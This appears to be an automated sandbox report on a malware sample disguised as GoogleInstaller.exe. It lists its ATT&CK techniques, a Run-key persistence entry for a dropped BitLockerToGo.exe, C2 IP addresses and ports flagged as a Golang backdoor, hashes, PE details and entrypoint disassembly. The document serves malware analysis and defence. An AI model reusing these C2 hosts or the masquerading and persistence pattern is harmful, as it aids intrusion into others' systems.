    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6512, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6512, type: MEMORYSTR
    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
    Execution: 12 Command and Scripting Interpreter; 1 PowerShell; At; Cron; Launchd
    Persistence: 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
    Privilege Escalation: 311 Process Injection; 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script
    Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 311 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
    Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 11 System Information Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
    Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
    Command and Control: 1 Non-Standard Port; 2 Non-Application Layer Protocol; 2 Application Layer Protocol; 1 Proxy; Fallback Channels
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Source | Detection | Scanner | Label
GoogleInstaller.exe | 13% | ReversingLabs |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
198.187.3.20.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://46.8.232.106/ | false | | unknown
http://46.8.236.61/ | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://protobuf.dev/reference/go/faq#namespace-conflictduration | GoogleInstaller.exe | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2473404910.00000000055A6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.2473404910.0000000005451000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2473404910.00000000055A6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://46.8.232.106 | BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.co | powershell.exe, 00000006.00000002.2487699090.0000000007A24000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/golang/protobuf/issues/1609): | GoogleInstaller.exe | false | | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://93.185.159.253 | BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://46.8.236.61 | BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://91.212.166.91User-Agent: | BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://91.212.166.91http://46.8.232.106 | BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCC0000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.2473404910.0000000005451000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2473404910.00000000055A6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://91.212.166.91 | BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCC0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
46.8.232.106 | unknown | Russian Federation | 28917 | FIORD-AS IP-transit operator in Russia Ukraine and Baltics | false
46.8.236.61 | unknown | Russian Federation | 28917 | FIORD-AS IP-transit operator in Russia Ukraine and Baltics | false
94.103.90.9 | unknown | Russian Federation | 48282 | VDSINA-ASRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1524043
Start date and time: 2024-10-02 15:12:40 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: GoogleInstaller.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/4@1/3
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target BitLockerToGo.exe, PID 6512 because there are no executed functions
• Execution Graph export aborted for target GoogleInstaller.exe, PID 4188 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 1216 because it is empty
• Not all processes were analyzed, report is missing behavior information
• VT rate limit hit for: GoogleInstaller.exe
Time | Type | Description
15:13:58 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run App C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
15:14:06 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run App C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
94.103.90.9 | SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | malicious | GO Backdoor |
 | SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | malicious | GO Backdoor |
 | file.dll | malicious | Unknown |
 | file.exe | malicious | Unknown |
 | 441vdCp7gV.exe | malicious | Unknown |
 | Z5SPXXNxC2.exe | malicious | Unknown |
 | bca1b830105b7ffeae00fea5f3a993586d0b85e9e3ef2.exe | malicious | Amadey |
 | eBVZ89cKVG.exe | malicious | LummaC Stealer, RedLine, SectopRAT |
 | ystCwvqbxR.exe | malicious | LummaC Stealer, RedLine, SectopRAT |
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 46.8.231.109
 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 46.8.231.109
 | file.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
 | file.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
 | file.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
 | file.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
 | 6JA2YPtbeB.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
 | hTR7xY0d0V.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
 | N83LFtMTUS.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
VDSINA-ASRU | Implosions.exe | malicious | RedLine | 109.234.38.212
 | aisuru.arm.elf | malicious | Unknown | 94.103.83.102
 | PQ2AUndsdb.exe | malicious | Amadey, AsyncRAT, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc | 62.113.117.95
 | SecuriteInfo.com.Win32.PWSX-gen.663.14886.exe | malicious | XRed, XWorm | 62.113.117.95
 | SecuriteInfo.com.BackDoor.AsyncRATNET.1.5719.7945.exe | malicious | AsyncRAT, VenomRAT | 62.113.117.95
 | ExeFile (88).exe | malicious | RedLine | 94.103.86.184
 | SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | malicious | GO Backdoor | 94.103.90.9
 | SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | malicious | GO Backdoor | 94.103.90.9
 | SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe | malicious | GO Backdoor | 195.2.70.38
 | mips.elf | malicious | Unknown | 94.103.91.233
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 46.8.231.109
 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 46.8.231.109
 | file.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
 | file.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
 | file.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
 | file.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
 | 6JA2YPtbeB.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
 | hTR7xY0d0V.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
 | N83LFtMTUS.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
No context
No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1264
Entropy (8bit): 5.367738859690877
Encrypted: false
SSDEEP: 24:3F5WSKco4KmBs4RPT6BmFoUebIlmjKcmZ9tXt/NK3R8O9r/:vWSU4y4RQmFoUeUmfmZ9tlNWR8GT
MD5: 7ECC7556B9A908C6CF1EF9ECB063E1F1
SHA1: 3C6A4F28C753EAA03D574F8C5CD20BDC4F98704D
SHA-256: 4DF8E04AB0AAB39A19D4DCD4925843F2692EF0007A3E174A21A446E4090C69FA
SHA-512: B41025C9CA47A7E2E1122191C3F5E3E67CA5EC7D6FBDC1C2FB9E599465670DF8E81E95E0181FEEF0660C2E0930D8FA606840BD4C472CBCD5AB1889D808965CAE
Malicious: false
Reputation: low
Preview: @...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type: data
Category: dropped
Size (bytes): 324
Entropy (8bit): 6.182064437157936
Encrypted: false
SSDEEP: 6:5/Ksn3fYPA9gC9M9z8ykhDVOJh3Z5pj2CYId6BkIwE2EmAHnNNben:hF3fYL83Mv3bZIz2+nN8
MD5: F0EC2EB78EB25A163F428EA84FCD52A7
SHA1: 6F7D4B76636C42FCF8FA459A85436C22BC55D72A
SHA-256: BFD2FA609209C7FDDDB24EA9C5828093F8B5346CF737EC1F523FD8933B607B4D
SHA-512: 18A7095AD9CCD0D82E551F4C07AE15A6E4CFA27C6C7DE7C9412A225389DAC2B6C50AACC4C49933024EB3E7C50122224316C510A2A3F97D29604CB4697C68B357
Malicious: false
Preview: ......U<..\0..!_SQ."A4..L.Y5]U ]X6*=M.)QQ..\@ PSQ&4"Z.%.\(#.MX.$X!2.^%=TU.&.EP...*.....Q..P!.(.UY.".F..WA..?W?."_/'.@..?[.-.G*..\.Y2PV_*_...@.[.U.*4X.!#BS....)+.0.Y.Q...Y..S.9\A-+7L.=.P!3"].Y0M"\7X^'%V.*VV..%G..._! .V./RP2..@.\.Q.-5\UU.]...O<*T...W......=6....TR;.L.)SFS+#W.^2R"..G.1\\.,+R.?.["Q6@.= R(.!_...XR^)M.?^P>."_".S
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.385894507715907
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: GoogleInstaller.exe
File size: 17'015'808 bytes
MD5: 3d429d9f74da7b1f95ea8db8a486ed20
SHA1: 6e7d73e9fb4b67f0587cd7d6dbbabe72be42fa2e
SHA256: e1224cbff7ca30da4bbfeab556bf76f73576d76ae3cf42f49e778ca16ced6f15
SHA512: 8d5a18cc9f90be598fa55f100490e3cd54f0907f99c4d9ffc0546a622754ea42df93ba1fb342487398897a4ec031ee4d46c86f36dda6eb3a8d376528af2af396
SSDEEP: 393216:mLmKWTUoQsNAT3jhXjglcUN1Ix/LfPZGcg:UzMcCIf
TLSH: 2307BE01FAD748F1E943583190ABB22F53345E054B28DBEBEA947F2AF9772824D33255
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................>......... .............@..........................p............@................................
Icon Hash: f0d555131935e6e8
Entrypoint: 0x471820
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 1
File Version Major: 6
File Version Minor: 1
Subsystem Version Major: 6
Subsystem Version Minor: 1
Import Hash: 4f2f006e2ecf7172ad368f8289dc96c1
                                                  Instruction
                                                  jmp 00007FA878FBE4F0h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  sub esp, 28h
                                                  mov dword ptr [esp+1Ch], ebx
                                                  mov dword ptr [esp+10h], ebp
                                                  mov dword ptr [esp+14h], esi
                                                  mov dword ptr [esp+18h], edi
                                                  mov dword ptr [esp], eax
                                                  mov dword ptr [esp+04h], ecx
                                                  call 00007FA878FA2796h
                                                  mov eax, dword ptr [esp+08h]
                                                  mov edi, dword ptr [esp+18h]
                                                  mov esi, dword ptr [esp+14h]
                                                  mov ebp, dword ptr [esp+10h]
                                                  mov ebx, dword ptr [esp+1Ch]
                                                  add esp, 28h
                                                  retn 0004h
                                                  ret
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  sub esp, 08h
                                                  mov ecx, dword ptr [esp+0Ch]
                                                  mov edx, dword ptr [ecx]
                                                  mov eax, esp
                                                  mov dword ptr [edx+04h], eax
                                                  sub eax, 00010000h
                                                  mov dword ptr [edx], eax
                                                  add eax, 00000BA0h
                                                  mov dword ptr [edx+08h], eax
                                                  mov dword ptr [edx+0Ch], eax
                                                  lea edi, dword ptr [ecx+34h]
                                                  mov dword ptr [edx+18h], ecx
                                                  mov dword ptr [edi], edx
                                                  mov dword ptr [esp+04h], edi
                                                  call 00007FA878FC0944h
                                                  cld
                                                  call 00007FA878FBF9DEh
                                                  call 00007FA878FBE619h
                                                  add esp, 08h
                                                  ret
                                                  jmp 00007FA878FC07F0h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  mov ebx, dword ptr [esp+04h]
                                                  mov ebp, esp
                                                  mov dword ptr fs:[00000034h], 00000000h
                                                  mov ecx, dword ptr [ebx+04h]
                                                  cmp ecx, 00000000h
                                                  je 00007FA878FC07F1h
                                                  mov eax, ecx
                                                  shl eax, 02h
                                                  sub esp, eax
                                                  mov edi, esp
                                                  mov esi, dword ptr [ebx+08h]
                                                  cld
                                                  rep movsd
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x102a000 | 0x45e | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x105d000 | 0x29c22 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x102b000 | 0x30eb2 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xf9bd80 | 0xb8 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3e9478 | 0x3e9600 | cf3f12f8a6fde7b45888218e996c7218 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3eb000 | 0xbaff80 | 0xbb0000 | 22a0b1e92c3de39a46fc2d9cdfda3721 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xf9b000 | 0x8e140 | 0x45400 | d444747b8a1ede6b9ced3e071ae6ceef | False | 0.4357478282942238 | data | 5.602813249646608 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x102a000 | 0x45e | 0x600 | f306a5893c50804fc27968861c232cfe | False | 0.3639322916666667 | data | 4.0811011986954515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x102b000 | 0x30eb2 | 0x31000 | 94d97ec55f10298fcd6910189a20b5aa | False | 0.5761569276147959 | data | 6.64576400249757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x105c000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x105d000 | 0x29c22 | 0x29e00 | a9650a5e6e159ef15fb5003259efdae5 | False | 0.05824976679104477 | data | 1.2209019422388219 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x105d338 | 0x10df | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | | | 0.6135679555452651
RT_ICON | 0x105e418 | 0x751 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.7533368926855313
RT_ICON | 0x105eb6c | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.014624985212350644
RT_ICON | 0x106f394 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | | | 0.02230922850536052
RT_ICON | 0x107883c | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | | | 0.033179297597042516
RT_ICON | 0x107dcc4 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.022201228153046763
RT_ICON | 0x1081eec | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.04865145228215768
RT_ICON | 0x1084494 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.058395872420262666
RT_ICON | 0x108553c | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.13688524590163934
RT_ICON | 0x1085ec4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.1595744680851064
RT_GROUP_ICON | 0x108632c | 0x92 | data | | | 0.7054794520547946
RT_VERSION | 0x10863c0 | 0x490 | data | English | United States | 0.4323630136986301
RT_MANIFEST | 0x1086850 | 0x3d2 | XML 1.0 document, ASCII text, with very long lines (864) | English | United States | 0.5398773006134969
DLL | Import
kernel32.dll | WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-02T15:14:10.993284+0200 | 2855539 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 | 1 | 94.103.90.9 | 22993 | 192.168.2.6 | 54994 | TCP
2024-10-02T15:14:10.993489+0200 | 2855536 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 | 1 | 192.168.2.6 | 54994 | 94.103.90.9 | 22993 | TCP
2024-10-02T15:14:40.440237+0200 | 2855537 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 | 1 | 192.168.2.6 | 54994 | 94.103.90.9 | 22993 | TCP
2024-10-02T15:14:40.662521+0200 | 2855538 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 | 1 | 94.103.90.9 | 22993 | 192.168.2.6 | 54994 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 15:14:08.438694000 CEST | 54991 | 80 | 192.168.2.6 | 46.8.232.106
Oct 2, 2024 15:14:08.443566084 CEST | 80 | 54991 | 46.8.232.106 | 192.168.2.6
Oct 2, 2024 15:14:08.443733931 CEST | 54991 | 80 | 192.168.2.6 | 46.8.232.106
Oct 2, 2024 15:14:08.444242001 CEST | 54991 | 80 | 192.168.2.6 | 46.8.232.106
Oct 2, 2024 15:14:08.449125051 CEST | 80 | 54991 | 46.8.232.106 | 192.168.2.6
Oct 2, 2024 15:14:09.110162973 CEST | 80 | 54991 | 46.8.232.106 | 192.168.2.6
Oct 2, 2024 15:14:09.112505913 CEST | 54992 | 80 | 192.168.2.6 | 46.8.236.61
Oct 2, 2024 15:14:09.117337942 CEST | 80 | 54992 | 46.8.236.61 | 192.168.2.6
Oct 2, 2024 15:14:09.117424965 CEST | 54992 | 80 | 192.168.2.6 | 46.8.236.61
Oct 2, 2024 15:14:09.118948936 CEST | 54992 | 80 | 192.168.2.6 | 46.8.236.61
Oct 2, 2024 15:14:09.123765945 CEST | 80 | 54992 | 46.8.236.61 | 192.168.2.6
Oct 2, 2024 15:14:09.150819063 CEST | 54991 | 80 | 192.168.2.6 | 46.8.232.106
Oct 2, 2024 15:14:10.065938950 CEST | 80 | 54992 | 46.8.236.61 | 192.168.2.6
Oct 2, 2024 15:14:10.109041929 CEST | 54992 | 80 | 192.168.2.6 | 46.8.236.61
Oct 2, 2024 15:14:10.363579035 CEST | 54991 | 80 | 192.168.2.6 | 46.8.232.106
Oct 2, 2024 15:14:10.363953114 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:14:10.368912935 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:14:10.369035006 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:14:10.369359970 CEST | 80 | 54991 | 46.8.232.106 | 192.168.2.6
Oct 2, 2024 15:14:10.369414091 CEST | 54991 | 80 | 192.168.2.6 | 46.8.232.106
Oct 2, 2024 15:14:10.993283987 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:14:10.993489027 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
